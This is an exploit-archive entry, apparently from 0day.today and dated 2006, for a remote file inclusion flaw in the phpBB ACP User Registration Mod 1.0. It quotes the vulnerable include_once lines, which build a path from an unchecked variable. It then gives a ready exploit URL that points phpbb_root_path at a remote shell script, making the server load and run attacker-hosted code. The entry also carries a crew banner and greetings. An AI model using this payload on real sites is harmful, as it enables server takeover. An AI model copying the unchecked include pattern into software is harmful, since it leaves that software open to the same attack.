phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability

2006-10-13T00:00:00
ID 1337DAY-ID-988
Type zdt
Reporter bd0rk
Modified 2006-10-13T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability
================================================================



          ..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
          .%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
          ..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
          .....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
          ..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
          .................................................................
        
               phpBB ACP User Registration (MMW) Mod 1.00 File Inclusion Vulnerability


Date: 2006/10/13
Time: 18:20:57 => GMT+1:00

Founder: bd0rk || SOH-Crew
Greetz: Perle, Tr4ileR, nukedx


Code: include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);

[+]Exploit: http://[target]/[directory]/includes/functions_mod_user.php?phpbb_root_path=http://Sh3llScript?




#  0day.today [2018-01-02]  #